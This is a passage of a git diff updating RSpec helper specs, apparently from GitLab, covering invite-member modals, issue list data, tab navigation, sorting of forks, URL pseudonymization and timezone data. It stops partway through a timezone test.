a/spec/helpers/ci/jobs_helper_spec.rb b/spec/helpers/ci/jobs_helper_spec.rb new file mode 100644 index 00000000000..e5ef362e91b --- /dev/null +++ b/spec/helpers/ci/jobs_helper_spec.rb @@ -0,0 +1,25 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Ci::JobsHelper do + describe 'jobs data' do + let(:project) { create(:project, :repository) } + let(:bridge) { create(:ci_bridge, status: :pending) } + + subject(:bridge_data) { helper.bridge_data(bridge) } + + before do + allow(helper) + .to receive(:image_path) + .and_return('/path/to/illustration') + end + + it 'returns bridge data' do + expect(bridge_data).to eq({ + "build_name" => bridge.name, + "empty-state-illustration-path" => '/path/to/illustration' + }) + end + end +end diff --git a/spec/helpers/ide_helper_spec.rb b/spec/helpers/ide_helper_spec.rb index 503ad3ad66d..dc0a234f981 100644 --- a/spec/helpers/ide_helper_spec.rb +++ b/spec/helpers/ide_helper_spec.rb @@ -34,7 +34,7 @@ RSpec.describe IdeHelper do self.instance_variable_set(:@fork_info, fork_info) self.instance_variable_set(:@project, project) - serialized_project = API::Entities::Project.represent(project).to_json + serialized_project = API::Entities::Project.represent(project, current_user: project.creator).to_json expect(helper.ide_data) .to include( @@ -61,7 +61,7 @@ RSpec.describe IdeHelper do context 'and the callout has been dismissed' do it 'disables environment guidance' do - callout = create(:user_callout, feature_name: :web_ide_ci_environments_guidance, user: project.creator) + callout = create(:callout, feature_name: :web_ide_ci_environments_guidance, user: project.creator) callout.update!(dismissed_at: Time.now - 1.week) allow(helper).to receive(:current_user).and_return(User.find(project.creator.id)) expect(helper.ide_data).to include('enable-environments-guidance' => 'false') diff --git a/spec/helpers/invite_members_helper_spec.rb b/spec/helpers/invite_members_helper_spec.rb index 02f0416a17a..d8a97b93bc9 100644 --- a/spec/helpers/invite_members_helper_spec.rb +++ b/spec/helpers/invite_members_helper_spec.rb @@ -6,6 +6,7 @@ RSpec.describe InviteMembersHelper do include Devise::Test::ControllerHelpers let_it_be(:project) { create(:project) } + let_it_be(:group) { create(:group, projects: [project]) } let_it_be(:developer) { create(:user, developer_projects: [project]) } let(:owner) { project.owner } @@ -15,97 +16,24 @@ RSpec.describe InviteMembersHelper do end describe '#common_invite_modal_dataset' do - context 'when member_areas_of_focus is enabled', :experiment do - context 'with control experience' do - before do - stub_experiments(member_areas_of_focus: :control) - end - - it 'has expected attributes' do - attributes = { - areas_of_focus_options: [], - no_selection_areas_of_focus: [] - } - - expect(helper.common_invite_modal_dataset(project)).to include(attributes) - end - end - - context 'with candidate experience' do - before do - stub_experiments(member_areas_of_focus: :candidate) - end - - it 'has expected attributes', :aggregate_failures do - output = helper.common_invite_modal_dataset(project) - - expect(output[:no_selection_areas_of_focus]).to eq ['no_selection'] - expect(Gitlab::Json.parse(output[:areas_of_focus_options]).first['value']).to eq 'Contribute to the codebase' - end - end - end - - context 'when member_areas_of_focus is disabled' do - before do - stub_feature_flags(member_areas_of_focus: false) - end - - it 'has expected attributes' do - attributes = { - id: project.id, - name: project.name, - default_access_level: Gitlab::Access::GUEST, - areas_of_focus_options: [], - no_selection_areas_of_focus: [] - } - - expect(helper.common_invite_modal_dataset(project)).to include(attributes) - end + it 'has expected common attributes' do + attributes = { + id: project.id, + name: project.name, + default_access_level: Gitlab::Access::GUEST + } + + expect(helper.common_invite_modal_dataset(project)).to include(attributes) end context 'tasks_to_be_done' do - subject(:output) { helper.common_invite_modal_dataset(source) } - - let_it_be(:source) { project } - - before do - stub_experiments(invite_members_for_task: true) - end - - context 'when not logged in' do - before do - allow(helper).to receive(:params).and_return({ open_modal: 'invite_members_for_task' }) - end - - it "doesn't have the tasks to be done attributes" do - expect(output[:tasks_to_be_done_options]).to be_nil - expect(output[:projects]).to be_nil - expect(output[:new_project_path]).to be_nil - end - end + using RSpec::Parameterized::TableSyntax - context 'when logged in but the open_modal param is not present' do - before do - allow(helper).to receive(:current_user).and_return(developer) - end - - it "doesn't have the tasks to be done attributes" do - expect(output[:tasks_to_be_done_options]).to be_nil - expect(output[:projects]).to be_nil - expect(output[:new_project_path]).to be_nil - end - end - - context 'when logged in and the open_modal param is present' do - before do - allow(helper).to receive(:current_user).and_return(developer) - allow(helper).to receive(:params).and_return({ open_modal: 'invite_members_for_task' }) - end - - context 'for a group' do - let_it_be(:source) { create(:group, projects: [project]) } + subject(:output) { helper.common_invite_modal_dataset(source) } - it 'has the expected attributes', :aggregate_failures do + shared_examples_for 'including the tasks to be done attributes' do + it 'includes the tasks to be done attributes when expected' do + if expected? expect(output[:tasks_to_be_done_options]).to eq( [ { value: :code, text: 'Create/import code into a project (repository)' }, @@ -117,24 +45,70 @@ RSpec.describe InviteMembersHelper do [{ id: project.id, title: project.title }].to_json ) expect(output[:new_project_path]).to eq( - new_project_path(namespace_id: source.id) + source.is_a?(Project) ? '' : new_project_path(namespace_id: group.id) ) + else + expect(output[:tasks_to_be_done_options]).to be_nil + expect(output[:projects]).to be_nil + expect(output[:new_project_path]).to be_nil end end + end - context 'for a project' do - it 'has the expected attributes', :aggregate_failures do - expect(output[:tasks_to_be_done_options]).to eq( - [ - { value: :code, text: 'Create/import code into a project (repository)' }, - { value: :ci, text: 'Set up CI/CD pipelines to build, test, deploy, and monitor code' }, - { value: :issues, text: 'Create/import issues (tickets) to collaborate on ideas and plan work' } - ].to_json - ) - expect(output[:projects]).to eq( - [{ id: project.id, title: project.title }].to_json - ) - expect(output[:new_project_path]).to eq('') + context 'inviting members for tasks' do + where(:open_modal_param_present?, :logged_in?, :expected?) do + true | true | true + true | false | false + false | true | false + false | false | false + end + + with_them do + before do + allow(helper).to receive(:current_user).and_return(developer) if logged_in? + allow(helper).to receive(:params).and_return({ open_modal: 'invite_members_for_task' }) if open_modal_param_present? + end + + context 'when the source is a project' do + let_it_be(:source) { project } + + it_behaves_like 'including the tasks to be done attributes' + end + + context 'when the source is a group' do + let_it_be(:source) { group } + + it_behaves_like 'including the tasks to be done attributes' + end + end + end + + context 'the invite_for_help_continuous_onboarding experiment' do + where(:invite_for_help_continuous_onboarding?, :logged_in?, :expected?) do + true | true | true + true | false | false + false | true | false + false | false | false + end + + with_them do + before do + allow(helper).to receive(:current_user).and_return(developer) if logged_in? + stub_experiments(invite_for_help_continuous_onboarding: :candidate) if invite_for_help_continuous_onboarding? + end + + context 'when the source is a project' do + let_it_be(:source) { project } + + it_behaves_like 'including the tasks to be done attributes' + end + + context 'when the source is a group' do + let_it_be(:source) { group } + + let(:expected?) { false } + + it_behaves_like 'including the tasks to be done attributes' end end end diff --git a/spec/helpers/issues_helper_spec.rb b/spec/helpers/issues_helper_spec.rb index 43b27dded3b..ad0ea6911f1 100644 --- a/spec/helpers/issues_helper_spec.rb +++ b/spec/helpers/issues_helper_spec.rb @@ -278,11 +278,13 @@ RSpec.describe IssuesHelper do it 'returns expected result' do expected = { can_create_issue: 'true', + can_destroy_issue: 'true', can_reopen_issue: 'true', can_report_spam: 'false', can_update_issue: 'true', iid: issue.iid, is_issue_author: 'false', + issue_path: issue_path(issue), issue_type: 'issue', new_issue_path: new_project_issue_path(project, { issue: { description: "Related to \##{issue.iid}.\n\n" } }), project_path: project.full_path, @@ -302,6 +304,7 @@ RSpec.describe IssuesHelper do allow(helper).to receive(:can?).and_return(true) allow(helper).to receive(:image_path).and_return('#') allow(helper).to receive(:import_csv_namespace_project_issues_path).and_return('#') + allow(helper).to receive(:issue_repositioning_disabled?).and_return(true) allow(helper).to receive(:url_for).and_return('#') expected = { @@ -318,6 +321,8 @@ RSpec.describe IssuesHelper do has_any_issues: project_issues(project).exists?.to_s, import_csv_issues_path: '#', initial_email: project.new_issuable_address(current_user, 'issue'), + is_anonymous_search_disabled: 'true', + is_issue_repositioning_disabled: 'true', is_project: 'true', is_signed_in: current_user.present?.to_s, jira_integration_path: help_page_url('integration/jira/issues', anchor: 'view-jira-issues'), @@ -338,6 +343,10 @@ RSpec.describe IssuesHelper do end describe '#project_issues_list_data' do + before do + stub_feature_flags(disable_anonymous_search: true) + end + context 'when user is signed in' do it_behaves_like 'issues list data' do let(:current_user) { double.as_null_object } diff --git a/spec/helpers/jira_connect_helper_spec.rb b/spec/helpers/jira_connect_helper_spec.rb index 55a5c724665..0f78185dc7d 100644 --- a/spec/helpers/jira_connect_helper_spec.rb +++ b/spec/helpers/jira_connect_helper_spec.rb @@ -19,7 +19,9 @@ RSpec.describe JiraConnectHelper do is_expected.to include( :groups_path, :subscriptions_path, - :users_path + :users_path, + :subscriptions, + :gitlab_user_path ) end @@ -32,6 +34,10 @@ RSpec.describe JiraConnectHelper do expect(subject[:groups_path]).to include("#{skip_groups_param}=#{subscription.namespace.id}") end + + it 'assigns gitlab_user_path to nil' do + expect(subject[:gitlab_user_path]).to be_nil + end end context 'user is logged in' do @@ -42,6 +48,10 @@ RSpec.describe JiraConnectHelper do it 'assigns users_path to nil' do expect(subject[:users_path]).to be_nil end + + it 'assigns gitlab_user_path correctly' do + expect(subject[:gitlab_user_path]).to eq(user_path(user)) + end end end end diff --git a/spec/helpers/learn_gitlab_helper_spec.rb b/spec/helpers/learn_gitlab_helper_spec.rb index b9f34853a77..9d13fc65de7 100644 --- a/spec/helpers/learn_gitlab_helper_spec.rb +++ b/spec/helpers/learn_gitlab_helper_spec.rb @@ -60,6 +60,7 @@ RSpec.describe LearnGitlabHelper do let(:onboarding_actions_data) { Gitlab::Json.parse(learn_gitlab_data[:actions]).deep_symbolize_keys } let(:onboarding_sections_data) { Gitlab::Json.parse(learn_gitlab_data[:sections]).deep_symbolize_keys } + let(:onboarding_project_data) { Gitlab::Json.parse(learn_gitlab_data[:project]).deep_symbolize_keys } shared_examples 'has all data' do it 'has all actions' do @@ -82,6 +83,11 @@ RSpec.describe LearnGitlabHelper do expect(onboarding_sections_data.keys).to contain_exactly(:deploy, :plan, :workspace) expect(onboarding_sections_data.values.map { |section| section.keys }).to match_array([[:svg]] * 3) end + + it 'has all project data', :aggregate_failures do + expect(onboarding_project_data.keys).to contain_exactly(:name) + expect(onboarding_project_data.values).to match_array([project.name]) + end end it_behaves_like 'has all data' diff --git a/spec/helpers/markup_helper_spec.rb b/spec/helpers/markup_helper_spec.rb index e946857ac77..ab2f6fa5b7e 100644 --- a/spec/helpers/markup_helper_spec.rb +++ b/spec/helpers/markup_helper_spec.rb @@ -321,7 +321,7 @@ RSpec.describe MarkupHelper do let(:context) do { pipeline: :wiki, project: project, wiki: wiki, - page_slug: 'nested/page', issuable_state_filter_enabled: true, + page_slug: 'nested/page', issuable_reference_expansion_enabled: true, repository: wiki_repository } end @@ -584,9 +584,9 @@ FooBar it 'preserves code color scheme' do object = create_object("```ruby\ndef test\n 'hello world'\nend\n```") - expected = "<pre class=\"code highlight js-syntax-highlight language-ruby\">" \ + expected = "\n<pre class=\"code highlight js-syntax-highlight language-ruby\">" \ "<code><span class=\"line\"><span class=\"k\">def</span> <span class=\"nf\">test</span>...</span>\n" \ - "</code></pre>" + "</code></pre>\n" expect(first_line_in_markdown(object, attribute, 150, project: project)).to eq(expected) end diff --git a/spec/helpers/namespaces_helper_spec.rb b/spec/helpers/namespaces_helper_spec.rb index 68bc19cb429..6eb560e3f5c 100644 --- a/spec/helpers/namespaces_helper_spec.rb +++ b/spec/helpers/namespaces_helper_spec.rb @@ -45,6 +45,39 @@ RSpec.describe NamespacesHelper do user_group.add_owner(user) end + describe '#namespaces_as_json' do + let(:result) { helper.namespaces_as_json(user) } + + before do + allow(helper).to receive(:current_user).and_return(user) + end + + it 'returns the user\'s groups' do + json_data = Gitlab::Json.parse(result) + + expect(result).to include('group') + expect(json_data['group']).to include( + "id" => user_group.id, + "name" => user_group.name, + "display_path" => user_group.full_path, + "human_name" => user_group.human_name + ) + end + + it 'returns the user\'s namespace' do + user_namespace = user.namespace + json_data = Gitlab::Json.parse(result) + + expect(result).to include('user') + expect(json_data['user']).to include( + "id" => user_namespace.id, + "name" => user_namespace.name, + "display_path" => user_namespace.full_path, + "human_name" => user_namespace.human_name + ) + end + end + describe '#namespaces_options' do context 'when admin mode is enabled', :enable_admin_mode do it 'returns groups without being a member for admin' do diff --git a/spec/helpers/nav/new_dropdown_helper_spec.rb b/spec/helpers/nav/new_dropdown_helper_spec.rb index 64f4d5ff797..ab206152e3d 100644 --- a/spec/helpers/nav/new_dropdown_helper_spec.rb +++ b/spec/helpers/nav/new_dropdown_helper_spec.rb @@ -13,8 +13,6 @@ RSpec.describe Nav::NewDropdownHelper do let(:with_can_create_project) { false } let(:with_can_create_group) { false } let(:with_can_create_snippet) { false } - let(:with_invite_members_experiment) { false } - let(:with_invite_members_experiment_enabled) { false } let(:subject) { helper.new_dropdown_view_model(project: current_project, group: current_group) } @@ -28,11 +26,6 @@ RSpec.describe Nav::NewDropdownHelper do end before do - allow(::Gitlab::Experimentation).to receive(:active?).with(:invite_members_new_dropdown) { with_invite_members_experiment } - allow(helper).to receive(:experiment_enabled?).with(:invite_members_new_dropdown) { with_invite_members_experiment_enabled } - allow(helper).to receive(:tracking_label) { 'test_tracking_label' } - allow(helper).to receive(:experiment_tracking_category_and_group) { |x| x } - allow(helper).to receive(:current_user) { current_user } allow(helper).to receive(:can?) { false } @@ -42,38 +35,23 @@ RSpec.describe Nav::NewDropdownHelper do end shared_examples 'invite member link shared example' do - it 'shows invite member link' do + it 'shows invite member link with emoji' do expect(subject[:menu_sections]).to eq( expected_menu_section( title: expected_title, menu_item: ::Gitlab::Nav::TopNavMenuItem.build( id: 'invite', title: 'Invite members', + emoji: 'shaking_hands', href: expected_href, data: { - track_action: 'click_link', - track_label: 'test_tracking_label', - track_property: :invite_members_new_dropdown + track_action: 'click_link_invite_members', + track_label: 'plus_menu_dropdown' } ) ) ) end - - context 'with experiment enabled' do - let(:with_invite_members_experiment_enabled) { true } - - it 'shows emoji with invite member link' do - expect(subject[:menu_sections]).to match( - expected_menu_section( - title: expected_title, - menu_item: a_hash_including( - emoji: 'shaking_hands' - ) - ) - ) - end - end end it 'has title' do diff --git a/spec/helpers/notify_helper_spec.rb b/spec/helpers/notify_helper_spec.rb index a4193444528..e2a7a212b1b 100644 --- a/spec/helpers/notify_helper_spec.rb +++ b/spec/helpers/notify_helper_spec.rb @@ -55,53 +55,4 @@ RSpec.describe NotifyHelper do def reference_link(entity, url) "<a href=\"#{url}\">#{entity.to_reference}</a>" end - - describe '#invited_join_url' do - let_it_be(:member) { create(:project_member) } - - let(:token) { '_token_' } - - context 'when invite_email_preview_text is enabled', :experiment do - before do - stub_experiments(invite_email_preview_text: :control) - end - - it 'has correct params' do - expect(helper.invited_join_url(token, member)) - .to eq("http://test.host/-/invites/#{token}?experiment_name=invite_email_preview_text&invite_type=initial_email") - end - - context 'when invite_email_from is enabled' do - before do - stub_experiments(invite_email_from: :control) - end - - it 'has correct params' do - expect(helper.invited_join_url(token, member)) - .to eq("http://test.host/-/invites/#{token}?experiment_name=invite_email_from&invite_type=initial_email") - end - end - end - - context 'when invite_email_from is enabled' do - before do - stub_experiments(invite_email_from: :control) - end - - it 'has correct params' do - expect(helper.invited_join_url(token, member)) - .to eq("http://test.host/-/invites/#{token}?experiment_name=invite_email_from&invite_type=initial_email") - end - end - - context 'when invite_email_preview_text is disabled' do - before do - stub_feature_flags(invite_email_preview_text: false) - end - - it 'has correct params' do - expect(helper.invited_join_url(token, member)).to eq("http://test.host/-/invites/#{token}?invite_type=initial_email") - end - end - end end diff --git a/spec/helpers/numbers_helper_spec.rb b/spec/helpers/numbers_helper_spec.rb new file mode 100644 index 00000000000..a546f625ce8 --- /dev/null +++ b/spec/helpers/numbers_helper_spec.rb @@ -0,0 +1,31 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe NumbersHelper do + describe '#limited_counter_with_delimiter' do + using RSpec::Parameterized::TableSyntax + + subject { limited_counter_with_delimiter(resource, **options) } + + where(:count, :options, :expected_result) do + # Using explicit limit + 9 | { limit: 10 } | '9' + 10 | { limit: 10 } | '10' + 11 | { limit: 10 } | '10+' + 12 | { limit: 10 } | '10+' + # Using default limit + 999 | {} | '999' + 1000 | {} | '1,000' + 1001 | {} | '1,000+' + 1002 | {} | '1,000+' + end + + with_them do + let(:page) { double('page', total_count_with_limit: [count, options.fetch(:limit, 1000) + 1].min) } + let(:resource) { class_double(Ci::Runner, page: page) } + + it { is_expected.to eq(expected_result) } + end + end +end diff --git a/spec/helpers/packages_helper_spec.rb b/spec/helpers/packages_helper_spec.rb index 2af572850da..06c6cccd488 100644 --- a/spec/helpers/packages_helper_spec.rb +++ b/spec/helpers/packages_helper_spec.rb @@ -260,34 +260,4 @@ RSpec.describe PackagesHelper do end end end - - describe '#packages_list_data' do - let_it_be(:resource) { project } - let_it_be(:type) { 'project' } - - let(:expected_result) do - { - resource_id: resource.id, - full_path: resource.full_path, - page_type: type - } - end - - subject(:result) { helper.packages_list_data(type, resource) } - - context 'at a project level' do - it 'populates presenter data' do - expect(result).to match(hash_including(expected_result)) - end - end - - context 'at a group level' do - let_it_be(:resource) { create(:group) } - let_it_be(:type) { 'group' } - - it 'populates presenter data' do - expect(result).to match(hash_including(expected_result)) - end - end - end end diff --git a/spec/helpers/projects_helper_spec.rb b/spec/helpers/projects_helper_spec.rb index 5d2af567549..cc443afee6e 100644 --- a/spec/helpers/projects_helper_spec.rb +++ b/spec/helpers/projects_helper_spec.rb @@ -991,4 +991,31 @@ RSpec.describe ProjectsHelper do expect(subject).to eq(project.path_with_namespace) end end + + describe '#fork_button_disabled_tooltip' do + using RSpec::Parameterized::TableSyntax + + subject { helper.fork_button_disabled_tooltip(project) } + + where(:has_user, :can_fork_project, :can_create_fork, :expected) do + false | false | false | nil + true | true | true | nil + true | false | true | 'You don\'t have permission to fork this project' + true | true | false | 'You have reached your project limit' + end + + with_them do + before do + current_user = user if has_user + + allow(helper).to receive(:current_user).and_return(current_user) + allow(user).to receive(:can?).with(:fork_project, project).and_return(can_fork_project) + allow(user).to receive(:can?).with(:create_fork).and_return(can_create_fork) + end + + it 'returns tooltip text when user lacks privilege' do + expect(subject).to eq(expected) + end + end + end end diff --git a/spec/helpers/routing/pseudonymization_helper_spec.rb b/spec/helpers/routing/pseudonymization_helper_spec.rb index 82ed893289d..d7905edb098 100644 --- a/spec/helpers/routing/pseudonymization_helper_spec.rb +++ b/spec/helpers/routing/pseudonymization_helper_spec.rb @@ -11,15 +11,15 @@ RSpec.describe ::Routing::PseudonymizationHelper do let(:merge_request) { create(:merge_request, source_project: project) } + let(:subject) { helper.masked_page_url(group: group, project: project) } + before do stub_feature_flags(mask_page_urls: true) - allow(helper).to receive(:group).and_return(group) - allow(helper).to receive(:project).and_return(project) end shared_examples 'masked url' do it 'generates masked page url' do - expect(helper.masked_page_url).to eq(masked_url) + expect(subject).to eq(masked_url) end end @@ -72,6 +72,8 @@ RSpec.describe ::Routing::PseudonymizationHelper do context 'with controller for groups with subgroups and project' do let(:masked_url) { "http://localhost/namespace#{subgroup.id}/project#{subproject.id}"} + let(:group) { subgroup } + let(:project) { subproject } let(:request) do double(:Request, path_parameters: { @@ -86,8 +88,6 @@ RSpec.describe ::Routing::PseudonymizationHelper do end before do - allow(helper).to receive(:group).and_return(subgroup) - allow(helper).to receive(:project).and_return(subproject) allow(helper).to receive(:request).and_return(request) end @@ -96,6 +96,7 @@ RSpec.describe ::Routing::PseudonymizationHelper do context 'with controller for groups and subgroups' do let(:masked_url) { "http://localhost/groups/namespace#{subgroup.id}/-/shared"} + let(:group) { subgroup } let(:request) do double(:Request, path_parameters: { @@ -109,7 +110,6 @@ RSpec.describe ::Routing::PseudonymizationHelper do end before do - allow(helper).to receive(:group).and_return(subgroup) allow(helper).to receive(:request).and_return(request) end @@ -160,7 +160,7 @@ RSpec.describe ::Routing::PseudonymizationHelper do end context 'when author_username is present' do - let(:masked_url) { "http://localhost/dashboard/issues?author_username=masked_author_username&scope=masked_scope&state=masked_state" } + let(:masked_url) { "http://localhost/dashboard/issues?author_username=masked_author_username&scope=all&state=opened" } let(:request) do double(:Request, path_parameters: { @@ -201,7 +201,7 @@ RSpec.describe ::Routing::PseudonymizationHelper do end context 'when query string has keys with the same names as path params' do - let(:masked_url) { "http://localhost/dashboard/issues?action=masked_action&scope=masked_scope&state=masked_state" } + let(:masked_url) { "http://localhost/dashboard/issues?action=masked_action&scope=all&state=opened" } let(:request) do double(:Request, path_parameters: { @@ -230,7 +230,7 @@ RSpec.describe ::Routing::PseudonymizationHelper do end it 'masked_page_url' do - expect(helper.masked_page_url).to eq(root_url) + expect(subject).to eq(root_url) end end end @@ -262,7 +262,7 @@ RSpec.describe ::Routing::PseudonymizationHelper do ActionController::RoutingError, url: '/dashboard/issues?assignee_username=root').and_call_original - expect(helper.masked_page_url).to be_nil + expect(subject).to be_nil end end end @@ -273,7 +273,7 @@ RSpec.describe ::Routing::PseudonymizationHelper do end it 'returns nil' do - expect(helper.masked_page_url).to be_nil + expect(subject).to be_nil end end end diff --git a/spec/helpers/sorting_helper_spec.rb b/spec/helpers/sorting_helper_spec.rb index f976fb098a8..b49b4ad6e7e 100644 --- a/spec/helpers/sorting_helper_spec.rb +++ b/spec/helpers/sorting_helper_spec.rb @@ -191,4 +191,77 @@ RSpec.describe SortingHelper do end end end + + describe 'with `forks` controller' do + before do + stub_controller_path 'forks' + end + + describe '#forks_sort_options_hash' do + it 'returns a hash of available sorting options' do + expect(forks_sort_options_hash).to include({ + sort_value_recently_created => sort_title_created_date, + sort_value_oldest_created => sort_title_created_date, + sort_value_latest_activity => sort_title_latest_activity, + sort_value_oldest_activity => sort_title_latest_activity + }) + end + end + + describe '#forks_reverse_sort_options_hash' do + context 'for each sort option' do + using RSpec::Parameterized::TableSyntax + + where(:sort_key, :reverse_sort_title) do + sort_value_recently_created | sort_value_oldest_created + sort_value_oldest_created | sort_value_recently_created + sort_value_latest_activity | sort_value_oldest_activity + sort_value_oldest_activity | sort_value_latest_activity + end + + with_them do + it 'returns the correct reversed hash' do + reverse_hash = forks_reverse_sort_options_hash + + expect(reverse_hash).to include(sort_key) + expect(reverse_hash[sort_key]).to eq(reverse_sort_title) + end + end + end + end + + describe '#forks_sort_direction_button' do + context 'for each sort option' do + using RSpec::Parameterized::TableSyntax + + sort_lowest_icon = 'sort-lowest' + sort_highest_icon = 'sort-highest' + + where(:selected_sort, :icon) do + sort_value_recently_created | sort_highest_icon + sort_value_latest_activity | sort_highest_icon + sort_value_oldest_created | sort_lowest_icon + sort_value_oldest_activity | sort_lowest_icon + end + + with_them do + it 'returns the correct icon' do + set_sorting_url selected_sort + + expect(forks_sort_direction_button(selected_sort)).to include(icon) + end + end + end + + it 'returns the correct link to reverse the current sort option' do + sort_options_links = forks_reverse_sort_options_hash + + sort_options_links.each do |selected_sort, reverse_sort| + set_sorting_url selected_sort + + expect(forks_sort_direction_button(selected_sort)).to include(reverse_sort) + end + end + end + end end diff --git a/spec/helpers/tab_helper_spec.rb b/spec/helpers/tab_helper_spec.rb index e5e88466946..f338eddedfd 100644 --- a/spec/helpers/tab_helper_spec.rb +++ b/spec/helpers/tab_helper_spec.rb @@ -7,62 +7,58 @@ RSpec.describe TabHelper do describe 'gl_tabs_nav' do it 'creates a tabs navigation' do - expect(gl_tabs_nav).to match(%r{<ul class=".*" role="tablist"><\/ul>}) + expect(helper.gl_tabs_nav).to match(%r{<ul class="nav gl-tabs-nav"><\/ul>}) end it 'captures block output' do - expect(gl_tabs_nav { "block content" }).to match(/block content/) - end - - it 'adds styles classes' do - expect(gl_tabs_nav).to match(/class="nav gl-tabs-nav"/) + expect(helper.gl_tabs_nav { "block content" }).to match(/block content/) end it 'adds custom class' do - expect(gl_tabs_nav(class: 'my-class' )).to match(/class=".*my-class.*"/) + expect(helper.gl_tabs_nav(class: 'my-class' )).to match(/class=".*my-class.*"/) end end describe 'gl_tab_link_to' do before do - allow(self).to receive(:current_page?).and_return(false) + allow(helper).to receive(:current_page?).and_return(false) end it 'creates a tab' do - expect(gl_tab_link_to('Link', '/url')).to eq('<li class="nav-item" role="presentation"><a class="nav-link gl-tab-nav-item" href="/url">Link</a></li>') + expect(helper.gl_tab_link_to('Link', '/url')).to eq('<li class="nav-item"><a class="nav-link gl-tab-nav-item" href="/url">Link</a></li>') end it 'creates a tab with block output' do - expect(gl_tab_link_to('/url') { 'block content' }).to match(/block content/) + expect(helper.gl_tab_link_to('/url') { 'block content' }).to match(/block content/) end it 'creates a tab with custom classes for enclosing list item without content block provided' do - expect(gl_tab_link_to('Link', '/url', { tab_class: 'my-class' })).to match(/<li class=".*my-class.*"/) + expect(helper.gl_tab_link_to('Link', '/url', { tab_class: 'my-class' })).to match(/<li class=".*my-class.*"/) end it 'creates a tab with custom classes for enclosing list item with content block provided' do - expect(gl_tab_link_to('/url', { tab_class: 'my-class' }) { 'Link' }).to match(/<li class=".*my-class.*"/) + expect(helper.gl_tab_link_to('/url', { tab_class: 'my-class' }) { 'Link' }).to match(/<li class=".*my-class.*"/) end it 'creates a tab with custom classes for anchor element' do - expect(gl_tab_link_to('Link', '/url', { class: 'my-class' })).to match(/<a class=".*my-class.*"/) + expect(helper.gl_tab_link_to('Link', '/url', { class: 'my-class' })).to match(/<a class=".*my-class.*"/) end it 'creates an active tab with item_active = true' do - expect(gl_tab_link_to('Link', '/url', { item_active: true })).to match(/<a class=".*active gl-tab-nav-item-active gl-tab-nav-item-active-indigo.*"/) + expect(helper.gl_tab_link_to('Link', '/url', { item_active: true })).to match(/<a class=".*active gl-tab-nav-item-active gl-tab-nav-item-active-indigo.*"/) end context 'when on the active page' do before do - allow(self).to receive(:current_page?).and_return(true) + allow(helper).to receive(:current_page?).and_return(true) end it 'creates an active tab' do - expect(gl_tab_link_to('Link', '/url')).to match(/<a class=".*active gl-tab-nav-item-active gl-tab-nav-item-active-indigo.*"/) + expect(helper.gl_tab_link_to('Link', '/url')).to match(/<a class=".*active gl-tab-nav-item-active gl-tab-nav-item-active-indigo.*"/) end it 'creates an inactive tab with item_active = false' do - expect(gl_tab_link_to('Link', '/url', { item_active: false })).not_to match(/<a class=".*active.*"/) + expect(helper.gl_tab_link_to('Link', '/url', { item_active: false })).not_to match(/<a class=".*active.*"/) end end end @@ -72,18 +68,18 @@ RSpec.describe TabHelper do before do allow(controller).to receive(:controller_name).and_return('foo') - allow(self).to receive(:action_name).and_return('foo') + allow(helper).to receive(:action_name).and_return('foo') end context 'with the content of the li' do it 'captures block output' do - expect(nav_link { "Testing Blocks" }).to match(/Testing Blocks/) + expect(helper.nav_link { "Testing Blocks" }).to match(/Testing Blocks/) end end it 'passes extra html options to the list element' do - expect(nav_link(action: :foo, html_options: { class: 'home' })).to match(/<li class="home active">/) - expect(nav_link(html_options: { class: 'active' })).to match(/<li class="active">/) + expect(helper.nav_link(action: :foo, html_options: { class: 'home' })).to match(/<li class="home active">/) + expect(helper.nav_link(html_options: { class: 'active' })).to match(/<li class="active">/) end where(:controller_param, :action_param, :path_param, :active) do @@ -120,13 +116,26 @@ RSpec.describe TabHelper do with_them do specify do - result = nav_link(controller: controller_param, action: action_param, path: path_param) + result = helper.nav_link(controller: controller_param, action: action_param, path: path_param) - if active - expect(result).to match(/active/) - else - expect(result).not_to match(/active/) - end + expect(result.include?('active')).to eq(active) + end + end + + where(:page, :excluded_page, :active) do + nil | nil | false + '_some_page_' | nil | true + '_some_page_' | '_excluded_page_' | true + '_some_page_' | '_some_page_' | false + end + + with_them do + specify do + allow(helper).to receive(:route_matches_pages?).and_return(page.present?, page == excluded_page) + + result = helper.nav_link(page: page, exclude_page: excluded_page) + + expect(result.include?('active')).to eq(active) end end @@ -147,13 +156,9 @@ RSpec.describe TabHelper do with_them do specify do - result = nav_link(controller: controller_param, action: action_param, path: path_param) + result = helper.nav_link(controller: controller_param, action: action_param, path: path_param) - if active - expect(result).to match(/active/) - else - expect(result).not_to match(/active/) - end + expect(result.include?('active')).to eq(active) end end end @@ -161,18 +166,24 @@ RSpec.describe TabHelper do describe 'gl_tab_counter_badge' do it 'creates a tab counter badge' do - expect(gl_tab_counter_badge(1)).to eq('<span class="badge badge-muted badge-pill gl-badge sm gl-tab-counter-badge">1</span>') + expect(helper.gl_tab_counter_badge(1)).to eq( + '<span class="gl-badge badge badge-pill badge-muted sm gl-tab-counter-badge">1</span>' + ) end context 'with extra classes' do it 'creates a tab counter badge with the correct class attribute' do - expect(gl_tab_counter_badge(1, { class: 'js-test' })).to eq('<span class="js-test badge badge-muted badge-pill gl-badge sm gl-tab-counter-badge">1</span>') + expect(helper.gl_tab_counter_badge(1, { class: 'js-test' })).to eq( + '<span class="gl-badge badge badge-pill badge-muted sm gl-tab-counter-badge js-test">1</span>' + ) end end context 'with data attributes' do it 'creates a tab counter badge with the data attributes' do - expect(gl_tab_counter_badge(1, { data: { some_attribute: 'foo' } })).to eq('<span class="badge badge-muted badge-pill gl-badge sm gl-tab-counter-badge" data-some-attribute="foo">1</span>') + expect(helper.gl_tab_counter_badge(1, { data: { some_attribute: 'foo' } })).to eq( + '<span data-some-attribute="foo" class="gl-badge badge badge-pill badge-muted sm gl-tab-counter-badge">1</span>' + ) end end end diff --git a/spec/helpers/time_zone_helper_spec.rb b/spec/helpers/time_zone_helper_spec.rb index 006fae5b814..e8d96ee0700 100644 --- a/spec/helpers/time_zone_helper_spec.rb +++ b/spec/helpers/time_zone_helper_spec.rb @@ -30,6 +30,30 @@ RSpec.describe TimeZoneHelper, :aggregate_failures do end end + context 'with abbr format' do + subject(:timezone_data) { helper.timezone_data(format: :abbr) } + + it 'matches schema' do + expect(timezone_data).not_to be_empty + + timezone_data.each_with_index do |timezone_hash, i| + expect(timezone_hash.keys).to contain_exactly( + :identifier, + :abbr + ), "Failed at index #{i}" + end + end + + it 'formats for display' do + tz = ActiveSupport::TimeZone.all[0] + + 